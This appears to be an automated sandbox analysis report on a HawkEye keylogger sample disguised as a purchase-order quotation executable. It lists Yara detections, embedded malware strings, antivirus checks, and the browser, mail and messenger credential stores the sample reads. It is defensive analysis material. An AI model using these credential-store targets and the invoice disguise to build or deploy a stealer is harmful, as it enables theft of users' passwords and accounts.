              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe Queries volume information (VolumeInformation) for the following files under C:\Windows\Fonts\, in this order: LBRITEI.TTF, LBRITEDI.TTF, LCALLIG.TTF, LFAX.TTF, LFAXD.TTF, LFAXI.TTF, LFAXDI.TTF, MAGNETOB.TTF, MATURASC.TTF, MOD20.TTF, NIAGENG.TTF, NIAGSOL.TTF, OLDENGL.TTF, ONYX.TTF, PARCHM.TTF, PLAYBILL.TTF, POORICH.TTF, RAVIE.TTF, INFROMAN.TTF, SHOWG.TTF, SNAP____.TTF, STENCIL.TTF, VINERITC.TTF, VIVALDII.TTF, VLADIMIR.TTF, LATINWD.TTF, TCM_____.TTF, TCMI____.TTF, TCB_____.TTF, TCBI____.TTF, TCCM____.TTF, TCCB____.TTF, TCCEB.TTF, SCRIPTBL.TTF, ROCK.TTF, ROCKI.TTF, ROCKB.TTF, ROCKEB.TTF, ROCKBI.TTF, ROCC____.TTF, ROCCB___.TTF, RAGE.TTF, PERTILI.TTF, PERTIBD.TTF, PER_____.TTF, PERI____.TTF, PERB____.TTF, PERBI___.TTF, PALSCRI.TTF, OCRAEXT.TTF, MAIAN.TTF, LTYPE.TTF, LTYPEO.TTF, LTYPEB.TTF, LTYPEBO.TTF, LSANS.TTF, LSANSD.TTF, LSANSI.TTF, LSANSDI.TTF, IMPRISHA.TTF, HATTEN.TTF, GOUDYSTO.TTF, GOUDOS.TTF, GOUDOSI.TTF, GOUDOSB.TTF, GLECB.TTF, GIL_____.TTF, GILI____.TTF, GILB____.TTF, GILBI___.TTF, GILC____.TTF, GLSNECB.TTF, GIGI.TTF, FRABK.TTF, FRABKIT.TTF, FORTE.TTF, FELIXTI.TTF, ERASMD.TTF, ERASLGHT.TTF, ERASDEMI.TTF, ERASBD.TTF, ENGR.TTF, ELEPHNT.TTF, ELEPHNTI.TTF, ITCEDSCR.TTF, CURLZ___.TTF, COPRGTL.TTF, COPRGTB.TTF, CENSCBK.TTF, SCHLBKI.TTF, SCHLBKB.TTF, SCHLBKBI.TTF, CASTELAR.TTF, CALIST.TTF, CALISTI.TTF, CALISTB.TTF, CALISTBI.TTF, BOOKOS.TTF, BOOKOSB.TTF, BOOKOSI.TTF, BOOKOSBI.TTF, BOD_R.TTF, BOD_I.TTF, BOD_B.TTF, BOD_BI.TTF, BOD_CR.TTF, BOD_BLAR.TTF, BOD_CI.TTF, BOD_CB.TTF, BOD_BLAI.TTF, BOD_CBI.TTF, ITCBLKAD.TTF, ARLRDBD.TTF, AGENCYR.TTF, AGENCYB.TTF, BSSYM7.TTF, REFSAN.TTF, REFSPCL.TTF, MTEXTRA.TTF, marlett.ttf, micross.ttf
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe Code function: 0_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00401B74
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 2_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 2_2_0040724C
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe Code function: 0_2_00B0E962 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 0_2_00B0E962
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 2_2_00406278 GetVersionExA, 2_2_00406278
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.301923048.0000000001677000.00000004.00000020.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

              Stealing of Sensitive Information:

              Yara detected HawkEye Keylogger
              Source: Yara match, file source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: Process Memory Space: WindowsUpdate.exe PID: 4848, type: MEMORY
              Source: Yara match, file source: Process Memory Space: WindowsUpdate.exe PID: 6328, type: MEMORY
              Source: Yara match, file source: Process Memory Space: PO 2010029_pdf Quotation from Alibaba Ale.exe PID: 2148, type: MEMORY
              Source: Yara match, file source: 11.2.WindowsUpdate.exe.1c5f0000.3.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 8.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 11.2.WindowsUpdate.exe.1ee40000.4.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 11.2.WindowsUpdate.exe.1ee40000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 11.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 8.2.WindowsUpdate.exe.1c5f0000.4.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 8.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 8.2.WindowsUpdate.exe.1ee00000.5.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 8.2.WindowsUpdate.exe.1c5f0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 11.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 11.2.WindowsUpdate.exe.1c5f0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 8.2.WindowsUpdate.exe.1ee00000.5.raw.unpack, type: UNPACKEDPE
              Yara detected MailPassView
              Source: Yara match, file source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match, file source: Process Memory Space: vbc.exe PID: 6084, type: MEMORY
              Source: Yara match, file source: Process Memory Space: WindowsUpdate.exe PID: 4848, type: MEMORY
              Source: Yara match, file source: Process Memory Space: WindowsUpdate.exe PID: 6328, type: MEMORY
              Source: Yara match, file source: Process Memory Space: PO 2010029_pdf Quotation from Alibaba Ale.exe PID: 2148, type: MEMORY
              Source: Yara match, file source: 2.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 11.2.WindowsUpdate.exe.1c5f0000.3.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 2.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 8.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 11.2.WindowsUpdate.exe.1ee40000.4.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 11.2.WindowsUpdate.exe.1ee40000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 11.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 8.2.WindowsUpdate.exe.1c5f0000.4.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 8.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 8.2.WindowsUpdate.exe.1ee00000.5.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 8.2.WindowsUpdate.exe.1c5f0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 11.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 11.2.WindowsUpdate.exe.1c5f0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 8.2.WindowsUpdate.exe.1ee00000.5.raw.unpack, type: UNPACKEDPE
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Tries to steal Instant Messenger accounts or passwords
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
              Tries to steal Mail credentials (via file access)
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
              Tries to steal Mail credentials (via file registry)
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword 2_2_00402D9A
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword 2_2_00402D9A
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: ESMTPPassword 2_2_004033D7
              Yara detected WebBrowserPassView password recovery tool
              Source: Yara match | File source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: vbc.exe PID: 968, type: MEMORY
              Source: Yara match | File source: Process Memory Space: WindowsUpdate.exe PID: 4848, type: MEMORY
              Source: Yara match | File source: Process Memory Space: WindowsUpdate.exe PID: 6328, type: MEMORY
              Source: Yara match | File source: Process Memory Space: PO 2010029_pdf Quotation from Alibaba Ale.exe PID: 2148, type: MEMORY
              Source: Yara match | File source: 11.2.WindowsUpdate.exe.1c5f0000.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 11.2.WindowsUpdate.exe.1ee40000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 11.2.WindowsUpdate.exe.1ee40000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 11.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.WindowsUpdate.exe.1c5f0000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.WindowsUpdate.exe.1ee00000.5.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.WindowsUpdate.exe.1c5f0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 11.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 11.2.WindowsUpdate.exe.1c5f0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.WindowsUpdate.exe.1ee00000.5.raw.unpack, type: UNPACKEDPE

              Remote Access Functionality:

              Detected HawkEye Rat
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe | String found in binary or memory: HawkEyeKeylogger
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe | String found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe | String found in binary or memory: HawkEye_Keylogger_Stealer_Records_
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe | String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp | String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp | String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp | String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp | String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp | String found in binary or memory: kr'&HawkEye_Keylogger_Execution_Confirmed_
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp | String found in binary or memory: kr#"HawkEye_Keylogger_Stealer_Records_
              Source: WindowsUpdate.exe | String found in binary or memory: HawkEyeKeylogger
              Source: WindowsUpdate.exe | String found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
              Source: WindowsUpdate.exe | String found in binary or memory: HawkEye_Keylogger_Stealer_Records_
              Source: WindowsUpdate.exe | String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
              Source: WindowsUpdate.exe, 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp | String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
              Source: WindowsUpdate.exe, 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp | String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
              Source: WindowsUpdate.exe, 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp | String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
              Source: WindowsUpdate.exe, 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp | String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
              Source: WindowsUpdate.exe | String found in binary or memory: HawkEyeKeylogger
              Source: WindowsUpdate.exe | String found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
              Source: WindowsUpdate.exe | String found in binary or memory: HawkEye_Keylogger_Stealer_Records_
              Source: WindowsUpdate.exe | String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
              Source: WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp | String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
              Source: WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp | String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
              Source: WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp | String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
              Source: WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp | String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
              Yara detected HawkEye Keylogger
              Source: Yara match | File source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, type: MEMORY
